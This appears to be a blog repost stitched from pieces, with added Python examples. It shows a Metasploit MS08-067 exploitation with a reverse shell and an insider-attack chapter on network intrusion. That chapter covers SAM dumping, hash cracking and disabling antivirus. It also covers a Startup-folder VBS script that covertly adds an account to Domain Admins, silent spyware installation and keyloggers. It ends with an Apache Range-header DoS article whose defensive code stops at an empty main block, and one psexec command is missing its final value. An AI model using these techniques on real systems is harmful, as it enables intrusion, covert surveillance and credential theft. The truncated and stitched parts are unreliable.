Referring back to the Metasploit output, the exploit attempt originated from 192.168.1.4:49623, matching the output we see in netstat. Let’s try a different payload. Press CTRL-Z to put this session into the background:

C:\>^Z
Background session 1? [y/N]  y
msf exploit(ms08_067_netapi) >

Now set the payload to windows/shell/reverse_tcp, the reverse shell that we discovered:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.6      yes        The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes        The local address
   LPORT     4444             yes       The local port

This payload requires an additional option, LHOST. The victim needs to know to which host to connect when the exploit is successful.

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.4:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 2 opened (192.168.1.4:4444 -> 192.168.1.6:1180)
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>echo w00t!
echo w00t!
w00t!

Notice that this is “session 2.” Press CTRL-Z to put this session in the background and go back to the Metasploit prompt. Then, issue the command sessions -l to list all active sessions:

Background session 2? [y/N]  y
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
  Id  Type   Information                              Connection
  --  ----   -----------                              ----------
  1   shell                                           192.168.1.4:49623 ->
192.168.1.6:4444
  2   shell  Microsoft Windows XP [Version 5.1.2600]  192.168.1.4:4444 ->
192.168.1.6:1180

It’s easy to bounce back and forth between these two sessions. Just use sessions -i <session>. If you don’t get a prompt immediately, try pressing ENTER.

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1…
C:\>^Z
Background session 1? [y/N] y
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2…
C:\WINDOWS\system32>

You now know the most important Metasploit console commands and understand the basic exploit-launching process. Next, we’ll explore other ways to use Metasploit in the penetration testing process.
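The difference between the bind_tcp and reverse_tcp runs above comes down to which side listens, and that is what decides whether a host firewall on the target gets in the way. The following is an added example, not code from the book or from Metasploit, that models the two directions with plain sockets on the loopback interface: a toy "shell" stands in for the stage sent to the XP host (it only understands echo), and the two demo functions play the bind handler and the reverse handler that msfconsole starts. Ports are assigned by the operating system rather than the 4444 used above, and nothing here exploits anything.

```python
"""Bind versus reverse shell payloads, modelled with plain sockets on loopback.
Added example, not Metasploit code. The 'payload' functions play the
compromised host; the 'demo' functions play the attacker's handler."""
import socket
import threading

HOST = "127.0.0.1"


def _toy_shell(conn):
    """Stand-in for the command-shell stage: 'echo X' replies X, EOF ends it."""
    with conn, conn.makefile("rwb", buffering=0) as f:
        for line in f:
            cmd = line.decode(errors="replace").strip()
            if cmd.startswith("echo "):
                f.write((cmd[5:] + "\n").encode())


def _listener(port=0):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((HOST, port))
    s.listen(1)
    s.settimeout(5)
    return s


def bind_payload():
    """Target side of windows/shell/bind_tcp: listen and wait for the attacker.
    A host firewall that blocks unsolicited inbound connections stops exactly this."""
    srv = _listener()

    def accept_one():
        conn, _ = srv.accept()
        srv.close()
        _toy_shell(conn)

    threading.Thread(target=accept_one, daemon=True).start()
    return srv.getsockname()[1]          # the LPORT the handler must connect to


def reverse_payload(lhost, lport):
    """Target side of windows/shell/reverse_tcp: connect back to LHOST:LPORT.
    Outbound connections are usually allowed, which is why this works through a firewall."""
    threading.Thread(
        target=lambda: _toy_shell(socket.create_connection((lhost, lport), timeout=5)),
        daemon=True).start()


def run(session, cmd):
    """Send one command over a session socket and return the reply line."""
    session.sendall((cmd + "\n").encode())
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = session.recv(1024)
        if not chunk:
            break
        buf += chunk
    return buf.decode().strip()


def demo_bind():
    """Bind handler: the exploit has run and the stage listens on the target, so
    the attacker connects to RHOST:LPORT (192.168.1.6:4444 in the run above)."""
    lport = bind_payload()
    with socket.create_connection((HOST, lport), timeout=5) as session:
        return run(session, "echo w00t!")


def demo_reverse():
    """Reverse handler: it must be listening on LHOST:LPORT before the exploit
    fires ('Started reverse handler'), otherwise the victim's connect-back has
    nowhere to go; then the victim connects out and the handler accepts."""
    handler = _listener()
    lhost, lport = handler.getsockname()
    reverse_payload(lhost, lport)
    session, _ = handler.accept()
    handler.close()
    session.settimeout(5)
    with session:
        return run(session, "echo w00t!")


if __name__ == "__main__":
    print("bind:   ", demo_bind())
    print("reverse:", demo_reverse())
```

The ordering inside demo_reverse is the reason msfconsole prints "Started reverse handler" before "Attempting to trigger the vulnerability": if LHOST is wrong or the handler is not yet listening, the exploit still succeeds on the target but no session ever appears.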

Posted by CEOinIRVINE

Conducting an Insider Attack

Conducting an attack from the inside can be accomplished by using familiar tools and techniques, all of which are found in this book. The primary difference is that you will be working inside the target company at a pre-specified privilege level of an employee, complete with your own network account. In most cases, you can arrange for a private place to work from, at least initially, but in some cases you may have to work out in the open in the presence of other employees. Both scenarios have their advantages; for example, whereas working in private allows you to work undisturbed, working with other employees allows you to get up to speed on security procedures more quickly.

No matter where you wind up working, it’s a given that you must be able to explain your presence, as any newcomer is likely to be questioned by curious coworkers. These encounters are far less stressful than encounters during social engineering or physical intrusions because you are legitimately working for someone at the target company and have an easy cover story. In most cases, a simple “consulting” explanation will suffice. In all cases, the fewer people at the target company that are aware of your activities, the more realistic the test will be. If the help desk staff or system administrators are aware that you are a gray hat posing as an employee with the intent of subverting security controls, they will be tempted to keep a close eye on what you’re doing or, in some cases, even give you specially prepared equipment to work from.

For this chapter, we’ll examine a hypothetical company called ComHugeCo Ltd. We’ve been given a Windows domain user account called MBryce with minimal privileges. We’ll attempt to gain domain administrator rights in order to search and access sensitive information.

Tools and Preparation

Each test will be slightly different depending on the environment you are working within. It’s best to work from equipment supplied by the target organization and begin with very little knowledge of the security controls in place. You should arrive prepared with everything you need to conduct your attack since you may not have an opportunity to download anything from the outside once you’re in. At the time of this writing, most companies use content filters. A good network security monitoring (NSM) system or intrusion detection system (IDS) operator will also notice binary downloads coming from hacking sites or even unfamiliar IP addresses. Have all the tools you are likely to need with you on removable media such as a USB drive or CD.

Since you may find the equipment provided fully or partially locked down, hardened, or centrally controlled, you should also have bootable media available to help you access both the individual system and the network at a higher privilege level than afforded your provided account. In the most difficult cases, such as a fully locked CMOS and full disk encryption, you may even want to bring a hard drive with a prepared operating system on it so that you can attempt to gain access to the subject network from the provided equipment. Having your tools with you will help you stay under the radar. We’ll discuss a few practical examples in the following sections.

Orientation

The most common configuration you’ll encounter is the Windows workstation, a stand-alone PC or laptop computer running a version of Microsoft Windows. It will most likely be connected to a wired LAN and utilize the Windows domain login. You’ll be given a domain account. Log in and have a look around. Take some time to “browse” the network using the Windows file explorer. You may see several Windows domains as well as drives mapped to file servers, some of which you may already be connected to. The whole point of the insider attack is to find sensitive information, so keep your eyes open for servers with descriptive names such as “HR” or “Engineering.” Once you feel comfortable that you know the bounds of your account and have a general view of the network, it’s time to start elevating your privilege level.

Gaining Local Administrator Privileges

The local operating system will have several built-in accounts, at least one of which will be highly privileged. By default, the most privileged account will be the Administrator account, but it’s not uncommon for the account to be renamed in an attempt to obscure it from attackers. Regardless of what the privileged account names are, they will almost always be in the Administrators group. An easy way to see what users are members of the local Administrators group of an individual machine is to use the built-in net command from the command prompt:

net localgroup Administrators

In addition to the Administrator account, there will often be other privileged accounts owned by the help desk and system administration groups within the company. For the purposes of our example, our machine uses the Windows default Administrator account.

The easiest way to gain access to the Administrator account is to reset its password. In order to do this while the operating system is running, you’d need to know the existing password, which you probably won’t. Windows protects the file that contains the password hashes, the SAM file, from being accessed while the OS is running. While there are exploits that allow access to the file’s contents while Windows is running, doing so may set off an alert if a centrally managed enterprise antivirus system is in place. Dumping the SAM file only gives you the password hashes, which you then will have to crack. While recovering the local Administrator password is on our agenda, we’ll remove the password from the Administrator account altogether. We’ll collect the SAM file and hashes along the way for cracking later. To do this, we’ll boot the system from a CD or USB drive and use the Offline NT Password and Registry Editor tool (referred to hereafter as “Offline NT Password” for short).

Most computers boot from removable media such as a CD-ROM or floppy disk when they detect the presence of either. If nothing is detected, the machine then boots from the first hard drive. Some machines are configured to bypass removable media devices but still provide a boot menu option during power-up. This menu allows the user to select which device to boot from. Our example uses the Phoenix BIOS, which allows the user to select a boot device by hitting the ESC key early in the boot process. In the worst case, or the best configurations, the boot menu will be password protected. If that’s the case, you’ll have to try dumping the SAM file with an exploit such as pwdump7 while the machine is running. Alternatively, you can install a hard drive of your own as primary to boot from and then access the target Windows drive as a secondary to recover the SAM file.

Offline NT Password is a stripped-down version of Linux with a menu-driven interface. By default, it steps you through the process of removing the Administrator account password. While we have the Windows file system accessible, we’ll also grab the SAM file before we remove the Administrator password. If you choose to boot Offline NT Password from a CD, make sure that you first insert a USB thumb drive to copy the SAM file to. This will make mounting it much easier.

Using Offline NT Password and Registry Editor

Offline NT Password runs in command-line mode. Once booted, it displays a menu-driven interface. In most cases, the default options will step you through mounting the primary drive and removing the Administrator account password, as described next.

Step One The tool presents a list of drives and makes a guess as to which one contains the Windows operating system. As you can see from Figure 6-1, it also detects inserted USB drives. This makes mounting them much easier, because if you insert one later, the tool often will not create the block device (/dev/sdb1) necessary to mount it.

Figure 6-1. Selecting the boot device


In this case, the boot device containing Windows is correctly identified by default, so simply press ENTER to proceed.

Step Two Next, the tool tries to guess the location of the SAM file. In Figure 6-2, we can see that it is correctly identified as located in WINDOWS/system32/config.

Figure 6-2. Finding the SAM file


Again, the correct action is preselected from the menu by default. Before continuing, however, we want to copy the SAM file to the USB drive. Since Offline NT Password is built on a simple Linux system, we can invoke another pseudo-terminal by pressing ALT-F2. This opens another shell with a command prompt. Mount the USB drive using the device name identified in step one and shown in Figure 6-1:

mount /dev/sdb1 /mnt

Next, copy the SAM and SECURITY files to the USB drive. Offline NT Password mounts the boot disk in the directory /disk.

cp /drive/WINDOWS/system32/config/SAM /mnt
cp /drive/WINDOWS/system32/config/SECURITY /mnt

Make sure you perform a directory listing of your USB drive to confirm you’ve copied the files correctly, as shown here:

Now return to the menu on pseudo-terminal one by pressing ALT-F1, and then press ENTER to accept the default location of the SAM file.

Step Three The tool will now look into the SAM file and list the accounts. It will then give you the option to remove or replace the selected account password. By default, the Administrator account will be selected, as shown here:

Once selected, the default option is to simply remove the password, as shown next. Although there is an option to reset the password to one of your own choosing, this is not recommended because you risk corrupting the SAM file. Press ENTER to accept the default.

Step Four Once the password is successfully removed from the SAM file, it must be written back to the file system. As shown here, the default option will do this and report success or failure, so press ENTER:

With the SAM file successfully written back to the file system, simply press ENTER for the default option to not try again, and the menu will exit. Remove the CD and reboot the system. You will now be able to log in as the local Administrator with no password.

Recovering the Administrator Password

Despite widely publicized best practices, in more cases than not the LAN Manager (LM) hash for the Administrator account will still be present on the local machine. This hash can easily be cracked to reveal the local Administrator account password. This password will almost never be unique to just one machine and will work on a group of computers on the target network. This will allow virtually full control of any peer computer on the network that shares the password.

Since you’re on the client’s site and using their equipment, your choices may be more limited than in your lab, but options include:

  • Bringing rainbow tables and software with you on a large USB hard drive

  • Using a dictionary attack with Cain or L0phtCrack

  • Taking the SAM file back to your office to crack overnight

  • Sending the SAM file to a member of your team on the outside

If you are working as a team and have someone available offsite, you may want to send the hashes to your team across the Internet via e-mail or web-based file sharing. This does present a risk, however, as it may be noticed by vigilant security personnel or reported by advanced detective controls. If you do decide to send the hashes, you should strongly encrypt the files, not only to obscure the contents but also to protect the hashes from interception or inadvertent disclosure. In our example, we’ll use Cain and rainbow tables from a USB hard drive running on the provided equipment now that we can log in as the local Administrator with no password.
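The passage above turns on one fact a defender can verify directly: whether the local accounts still have an LM hash stored at all. The following is an added example, not code from the chapter or from any of the tools it names. It reads pwdump-style records (user:rid:lm:nt:::) and reports the accounts whose LM field is something other than the well-known "no LM hash" value, which is what an administrator auditing the NoLMHash policy wants to see. The sample records are constructed and their hex values are placeholders, not real hashes.

```python
from typing import Dict, List, Optional

# The LM field Windows stores when it keeps no LM hash for an account
# (NoLMHash policy in effect, or a password longer than 14 characters).
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"


def parse_hash_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one pwdump-style record: user:rid:lm_hash:nt_hash:::"""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[0]:
        return None
    return {
        "user": parts[0],
        "rid": parts[1],
        "lm": parts[2].lower(),
        "nt": parts[3].lower(),
    }


def accounts_with_lm_hash(dump_text: str) -> List[str]:
    """Names of accounts whose LM hash is actually stored.

    These are the accounts the LM rainbow-table attack described in the text
    would work against; an empty list means NoLMHash is doing its job.
    """
    flagged = []
    for line in dump_text.splitlines():
        rec = parse_hash_line(line)
        if rec and rec["lm"] and rec["lm"] != EMPTY_LM_HASH:
            flagged.append(rec["user"])
    return flagged


# Constructed sample for the example; the hex values are placeholders, not real hashes.
SAMPLE_DUMP = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000000:::
helpdesk:1005:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
this line is not a record
"""

if __name__ == "__main__":
    for user in accounts_with_lm_hash(SAMPLE_DUMP):
        print(f"LM hash still stored for: {user}")
```

In the constructed sample only Administrator keeps an LM hash; Guest and helpdesk carry the empty marker and would not be recoverable from LM tables.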

Disabling Antivirus

Cain, like many gray hat tools, is likely to be noticed by almost any antivirus (AV) product installed on the system you’re using. If Cain is detected, it may be reported to the manager of the AV product at the company. Disabling AV software can be accomplished in any number of ways depending on the product and how it’s configured. The most common options include:

  • Uninstall it (may require booting into Safe Mode)

  • Rename the files or directories from an alternative OS (Linux)

  • Suspend the process or processes with Sysinternals Process Explorer

An AV product is typically included in the standard disk image used during the workstation provisioning process. Finding the AV product on the computer is usually a simple process, as it likely has a user-level component such as a tray icon or an entry in the Programs menu off the Start button. In their simplest forms, AV products may simply be removed via the Add or Remove Programs feature located in the Control Panel. Bear in mind that after you remove the AV product, you are responsible for the computer’s safety and behavior on the network, as AV is a first-line protective control. The risk is minimal because typically you’re not going to use the computer to access websites, read e-mail, instant message, or perform other high-risk activities.

If you are having difficulty uninstalling the AV product, try booting into Safe Mode. This limits the applications that are loaded to a minimum, which in many cases negates the active protective controls built into AV products and allows you to uninstall them.

If the product still will not uninstall even while in Safe Mode, you may have to boot the computer with an alternative OS that can mount an NTFS file system in read/write mode, such as Ubuntu or Knoppix. Once the NTFS is mounted under Linux, you can then rename the files or directory structure to prevent AV from loading during the boot process.

As an alternative, you may suspend the AV processes while you work. This may be necessary if the AV product is difficult to uninstall from the local machine without permission from the centralized application controller located somewhere else on the network. In some cases where an enterprise-level product is in use, the AV client will be pushed back onto the workstation and reinstalled if it’s not detected during periodic sweeps. You can use Sysinternals Process Explorer, procexp, to identify and suspend the processes related to the AV product. You may need to play with permissions to achieve this. To suspend a process using procexp, simply right-click the desired process from the displayed list and select Suspend from the drop-down menu, as shown in Figure 6-3. To resume the process, right-click it and select Restart from the drop-down menu.

Figure 6-3. Process Explorer


While the processes are suspended, you will be able to load previously prohibited tools, such as Cain, and perform your work. Keep in mind that you must remove your tools when you are finished, before you restart the AV processes, or their presence may be reported as an incident.

Raising Cain

Now that AV is disabled, you may load Cain. Execute the ca_setup.exe binary from your USB thumb drive or CD and install Cain. The install process will ask if you would like to install WinPcap. This is optional, as we will not be performing password sniffing or man-in-the-middle attacks for our simulated attack. Cain is primarily a password-auditing tool. It has a rich feature set, which could be the subject of an entire chapter, but for our purposes we’re going to use Cain to

  • Recover the Administrator password from the SAM file

  • Identify key users and computers on the network

  • Locate and control computers that use the same local Administrator password

  • Add our account to the Domain Administrators group

Recovering the local Administrator Password

With Cain running and the USB drive containing the recovered SAM file from the previous section inserted, click the Cracker tab, and then right-click in the empty workspace and select Add to List. Click the Import Hashes from a SAM Database radio button and select the recovered SAM file from the removable drive, as shown here:

Next you’ll need the boot key. This is used to unlock the SAM file in the event it is encrypted, as is the case in some configurations. Click the selection icon (…) to the right of the Boot Key (HEX) text box, and then click the Local System Boot Key button, as shown here:

Select and copy the displayed key, click Exit, and then paste the key into the Boot Key (HEX) text box. Click the Next button and the account names and hashes will appear in the Cracking window.

In our example, we’re going to recover the password using a cryptanalysis attack on the LM hashes. Using presorted rainbow tables, on a 1TB USB hard drive in this case, and Cain’s interface to the Rainbow Crack application, most passwords can be recovered in under 30 minutes. Right-click in the workspace of the Cracker section of Cain and select Cryptanalysis Attack | LM Hashes | via RainbowTables (RainbowCrack), as shown here:

Next you’ll be prompted to select the rainbow table files to process, in this case from the USB device. After the processing is complete, found passwords will be displayed in the Cracker section next to the account name. The lock icon to the left will change to an icon depicting a ring of keys, as shown here:

Now that we know what the original local Administrator password was, we can change it back on our machine. This will allow us to easily identify other machines on the network that use the same local Administrator password as we continue to investigate the network with Cain.

Identifying Who’s Who

Cain makes it easy to identify available domains, domain controllers, database servers, and even non-Windows resources such as Novell NetWare file servers. Cain also makes it easy to view both workstation and server machine names. Most companies use some sort of consistent naming convention. The naming convention can help you identify resources that likely store or process sensitive information; for example, a server named paychex might be worth looking at closely.

Using Cain’s enumeration feature, it is possible to view user account names and any descriptions that were provided at the time the accounts were created. Enumeration should be performed against domain controllers because these servers are responsible for authentication and contain lists of all users in each domain. Each network may contain multiple domain controllers, and they should each be enumerated. In some cases, the primary domain controller (PDC) may be configured or hardened in such a way that username enumeration may not be possible. In such cases, it is not unusual for a secondary or ternary domain controller to be vulnerable to enumeration.

To enumerate users from a domain controller with Cain, click the Network tab. In the left panel, drill down from Microsoft Windows Network to the domain name you’re interested in, and then to Domain Controllers. Continue to drill down by selecting the name of a domain controller and then Users. When the dialog box appears asking Start Users Enumeration, click Yes and a list of users will appear in the right panel, as shown in Figure 6-4.

Figure 6-4. PDC User Enumeration with Cain


From this hypothetical list, the BDover account stands out as potentially being highly privileged on the COMHUGECO domain because of its PC Support designation. The DAlduk and HJass accounts stand out as users likely to handle sensitive information. To see what domain groups BDover is a member of, open a command prompt and type

net user BDover /domain

To see which accounts are in the Domain Admins group, type

net group "domain admins" /domain

In our hypothetical network example, BDover is a member of the Domain Admins group. We now want to locate his computer. A simple way to do this is by using the PsLoggedOn tool from the Sysinternals Suite. Execute the command

psloggedon.exe -lx BDover

This will search through every computer in the domain in an attempt to find BDover locally logged on. Depending on the number of computers in the domain, this may take quite a while or simply be impractical. There are commercial help desk solutions available that quickly identify where a user is logged on. In lieu of that, we can check the computer names and comments for hints using Cain.

By clicking the All Computers selection under the COMHUGECO domain in the left panel, a list of computers currently connected to the domain is displayed. In addition to the computer name, the comments are displayed in the rightmost column. As we can see here, a computer described as “Bob’s Laptop” could be BDover’s:

Using PsLoggedOn, we can check to see if BDover is logged into the computer described as “Bob’s Laptop” by issuing the following command:

psloggedon \\comhugec-x31zfp

Next, by clicking the COMHUGEC-X31ZFP computer in the left pane of Cain, it will attempt to log in using the same account and password as the machine it’s running from. In our case, that’s the local Administrator account and recovered password. The account name that Cain uses to log into the remote computer is displayed to the right of the name. If Cain can’t log in using the local machine’s credentials, it will attempt to log in using anonymous. In our example, the local Administrator password is the same, as shown here:

Leveraging local Administrator Access

So far, we have recovered the shared local Administrator password, identified a privileged user, and found the user’s computer. At this point, we have multiple options. The right option will vary with each environment and configuration. In our situation, it would be advantageous to either add our account to the Domain Admins group or recover the BDover domain password. Either will allow us access to virtually any computer and any file stored on the network and protected by Active Directory.

Joining the Domain Admins Group

Adding a user to the Domain Admins group requires membership in that group. We know that user BDover is a member of that group, so we’ll try to get him to add our MBryce account to the Domain Admins group without his knowledge. By creating a small VBS script, go.vbs in this case, and placing it in the Startup directory on his computer, the next time he logs in, the script will run at his domain permission level, which is sufficient to add our account to the Domain Admins group. The go.vbs script is as follows:

Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "net group ""Domain Admins"" MBryce /ADD /DOMAIN",1

To place the script in the Startup directory, simply map the C$ share using the recovered local Administrator password. This can be done from the Cain interface, from Windows Explorer, or from the command prompt with the net use command. In our example, the file should be placed in C:\Documents and Settings\BDover\Start Menu\Programs\Startup. You will have to wait until the next time BDover logs in, which may be the following day. If you are impatient, you can reboot the computer remotely using the Sysinternals PsShutdown tool, but you do so at the risk of arousing the suspicion of the user. Confirm your membership in the Domain Admins group using the net group command and don’t forget to remove the VBS script from the remote computer.
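The persistence step described above leaves a very visible artifact: a script in another user's Startup folder. As an added example (not code from the chapter), the following Python sweep walks a profiles root, looks in each user's Startup folder, and lists every item that would execute at logon. The Windows XP layout is the one the text gives; the Vista-and-later layout is included as an assumption. The demo profile tree is constructed in a temporary directory so the scan runs offline; shortcuts (.lnk) are deliberately not flagged here because judging them requires resolving their targets.

```python
import tempfile
from pathlib import Path
from typing import Iterable, List, Tuple

# File types Explorer will run when it processes the Startup folder at logon.
SCRIPT_SUFFIXES = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd",
                   ".ps1", ".exe", ".com", ".scr", ".hta"}

# Per-user Startup folder relative to the profile directory.
XP_STARTUP = Path("Start Menu") / "Programs" / "Startup"          # layout used in the text
MODERN_STARTUP = (Path("AppData") / "Roaming" / "Microsoft" / "Windows"
                  / "Start Menu" / "Programs" / "Startup")        # assumption: Vista and later


def scan_startup_folders(profiles_root, layouts: Iterable[Path] = (XP_STARTUP, MODERN_STARTUP)) -> List[Tuple[str, str]]:
    """Return (user, relative path) for every script or executable found in a user's Startup folder."""
    root = Path(profiles_root)
    findings = []
    for profile in sorted(p for p in root.iterdir() if p.is_dir()):
        for layout in layouts:
            startup = profile / layout
            if not startup.is_dir():
                continue
            for item in sorted(startup.iterdir()):
                if item.is_file() and item.suffix.lower() in SCRIPT_SUFFIXES:
                    findings.append((profile.name, str(item.relative_to(root))))
    return findings


def build_demo_profiles() -> Path:
    """Construct a throwaway profile tree mirroring the scenario in the text (constructed sample)."""
    root = Path(tempfile.mkdtemp(prefix="profiles_"))
    bob = root / "BDover" / XP_STARTUP
    bob.mkdir(parents=True)
    (bob / "go.vbs").write_text("' placeholder: the contents are irrelevant to the scan\n")
    (bob / "desktop.ini").write_text("[.ShellClassInfo]\n")          # benign, not flagged
    alice = root / "DAlduk" / MODERN_STARTUP
    alice.mkdir(parents=True)
    (alice / "OneNote.lnk").write_bytes(b"")                         # shortcut, not flagged here
    (root / "MBryce" / XP_STARTUP).mkdir(parents=True)               # empty Startup folder
    return root


if __name__ == "__main__":
    for user, path in scan_startup_folders(build_demo_profiles()):
        print(f"{user}: {path}")
```

In practice the findings are compared against a baseline taken at provisioning time; anything that appears between baselines in a privileged user's Startup folder deserves a look.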

Recovering the User’s Domain Password

The simplest way to recover the user’s password, BDover in this case, is to use commercial activity-logging spyware. SpectorSoft eBlaster is perfect for the job and is not detected by commercial AV products. It can be installed in one of two ways: by using a standard installation procedure or by using a preconfigured silent installation package. The silent installation option costs more, $99 vs. $198, but will be easier to use during an insider attack exercise. Bring the binary with you because downloading it over the client’s LAN may get you noticed. To install the silent binary, place it in the Startup directory as described in the previous section or use PsExec from Sysinternals. If you must use the normal installation procedure, you’ll have to wait until the user is away from their computer and use Microsoft Remote Desktop Protocol (RDP) or DameWare. DameWare is a commercial remote desktop tool that can install itself remotely on the user’s computer and remove itself completely at the end of the session. If the user’s computer is not configured for terminal services, you can attempt to enable the service by running the following command line remotely with Sysinternals PsExec:

psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d


SpectorSoft eBlaster reports are delivered via e-mail at regular intervals, typically 30 minutes to one hour, and record all login, website, e-mail, and chat activity. Once installed, eBlaster can be remotely managed or even silently uninstalled through your account on the SpectorSoft website.

It is also possible to collect keystrokes using a physical inline device such as the KeyGhost. The device comes in three styles: inline with the keyboard cable (as shown in Figure 6-5), as a USB device, and as a stand-alone keyboard. Each version collects and stores all keystrokes typed. Keystrokes are retrieved by typing an unlock code with the device plugged into any computer; it will dump all stored data to a log file. Obviously, this is not a good solution for a portable computer, but on a workstation or a server, it’s unlikely to be detected.

Figure 6-5. KeyGhost device placement


Finding Sensitive Information

Along the way, you may find some users or servers you suspect contain sensitive information. Workstation and server names and descriptions can help point you in the right direction. Now that we have the keys to the kingdom, it’s very easy to access it. A tool that can help you locate further information is Google Desktop. Since we’re now a domain administrator, we can map entire file server drives or browse any specific user directory or workstation we think may contain valuable information. Once mapped, we can put Google Desktop to work to index the files for us. We can then search the indexed data by keywords such as SSN, Social Security, Account, Account Number, and so forth. We can also search by file types, such as spreadsheets or CAD drawings, or by any industry-specific terminology. Google Desktop can also help pinpoint obscure file storage directories that may not have been noticed any other way during the testing process.

References

Cain www.oxid.it/

DameWare www.dameware.com/

Google Desktop desktop.google.com/

KeyGhost www.keyghost.com/

Knoppix www.knoppix.org/

Offline NT Password and Registry Editor pogostick.net/~pnh/ntpasswd/

SpectorSoft eBlaster www.spectorsoft.com/

Sysinternals Suite technet.microsoft.com/en-us/sysinternals/bb842062.aspx

L0phtCrack www.l0phtcrack.com


"Apache Killer" a DDoS using the Range HTTP Header

In 2007, a Google engineer, Michal Zalewski, published a memo detailing a potential vulnerability of both Apache and IIS Web Servers after investigating the HTTP/1.1 "Range" header implementation. He reported then:

it is my impression that a lone, short request can be used to trick the server into firing gigabytes of bogus data into the void, regardless of the server file size, connection count, or keep-alive request number limits implemented by the administrator. Whoops?

A proof of concept for the Apache DDoS tool was published as a Perl script on the August 19 “Full Disclosure” security mailing list. On August 24, the Apache Security Team published a memo explaining:

It most commonly manifests itself when static content is made available with compression on the fly through mod_deflate - but other modules which buffer and/or generate content in-memory are likely to be affected as well. This is a very common (the default right!?) configuration.

The attack can be done remotely and with a modest number of requests leads to very significant memory and CPU usage.

Active use of this tool has been observed in the wild.

There is currently no patch/new version of apache which fixes this vulnerability. This advisory will be updated when a long term fix is available. A fix is expected in the next 96 hours.

On Friday, Apache published a second advisory explaining how Apache httpd and its so-called internal 'bucket brigades' behave when the server processes a request for multiple (overlapping) ranges, in the order requested. A single request can ask for a very large range (e.g. from byte 0 to the end) hundreds of times. Currently such requests internally explode into hundreds of large fetches, all of which are kept in memory in an inefficient way.

This is being addressed in two ways. By making things more efficient. And by weeding out or simplifying requests deemed too unwieldy. There are several immediate options to mitigate this issue until a full fix is available.

Apache's mitigation strategies ranged from completely disallowing the Range header, to limiting the size of requests, to deploying a custom Range counting module. Lori MacVittie detailed how the mitigation strategies could be implemented with Big-IP.
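The mitigations listed above (refusing the Range header outright, or counting the ranges a request carries) can be shown as a small request-time check. The following Python module is an added example, not code from Apache or from the article: it parses a Range header value, resolves each range against the resource length, and decides whether to honour it, ignore it and serve the full body, or reject it. The limit of five ranges and the treatment of overlapping ranges as abusive are assumptions chosen for illustration, not values from the advisory.

```python
import re
from typing import List, Optional, Tuple

# Policy threshold for this example (assumption, not an Apache default).
MAX_RANGES = 5

ByteRange = Tuple[Optional[int], Optional[int]]  # (first, last); None = open end


def parse_byte_ranges(header: str) -> Optional[List[ByteRange]]:
    """Parse a Range header value such as "bytes=0-99,200-,-500".

    Returns None when the value is syntactically invalid; per HTTP/1.1 an
    invalid Range header is ignored and the full representation is served.
    """
    m = re.fullmatch(r"\s*bytes\s*=\s*(.*)", header)
    if not m:
        return None
    ranges: List[ByteRange] = []
    for spec in m.group(1).split(","):
        spec = spec.strip()
        if not spec:
            continue
        mm = re.fullmatch(r"(\d*)-(\d*)", spec)
        if not mm or (mm.group(1) == "" and mm.group(2) == ""):
            return None
        first = int(mm.group(1)) if mm.group(1) else None
        last = int(mm.group(2)) if mm.group(2) else None
        if first is not None and last is not None and last < first:
            return None
        ranges.append((first, last))
    return ranges or None


def resolve(ranges: List[ByteRange], content_length: int) -> List[Tuple[int, int]]:
    """Turn range specs into absolute [first, last] intervals, dropping unsatisfiable ones."""
    out = []
    for first, last in ranges:
        if first is None:                      # suffix range "-N": the last N bytes
            first = max(0, content_length - last)
            last = content_length - 1
        else:                                  # "A-" or "A-B", clipped to the body
            last = content_length - 1 if last is None else min(last, content_length - 1)
        if first <= last:
            out.append((first, last))
    return out


def assess_range_header(header: str, content_length: int, max_ranges: int = MAX_RANGES) -> Tuple[str, str]:
    """Decide how to treat a Range header for a body of content_length bytes.

    Returns (action, reason) with action one of:
      "serve"  - honour the ranges (206 Partial Content)
      "ignore" - drop the header and send the whole body (200 OK), the
                 fallback the advisory's mitigations relied on
      "reject" - nothing is satisfiable (416)
    """
    ranges = parse_byte_ranges(header)
    if ranges is None:
        return "ignore", "malformed Range header"
    if len(ranges) > max_ranges:
        return "ignore", f"{len(ranges)} ranges exceeds limit of {max_ranges}"
    intervals = resolve(ranges, content_length)
    if not intervals:
        return "reject", "no satisfiable range"
    # Overlapping ranges force the server to materialise the same bytes repeatedly,
    # which is the amplification the attack tool exploited.
    intervals.sort()
    for (_, prev_last), (first, _) in zip(intervals, intervals[1:]):
        if first <= prev_last:
            return "ignore", "overlapping ranges"
    requested = sum(last - first + 1 for first, last in intervals)
    return "serve", f"{len(intervals)} range(s), {requested} bytes"


if __name__ == "__main__":
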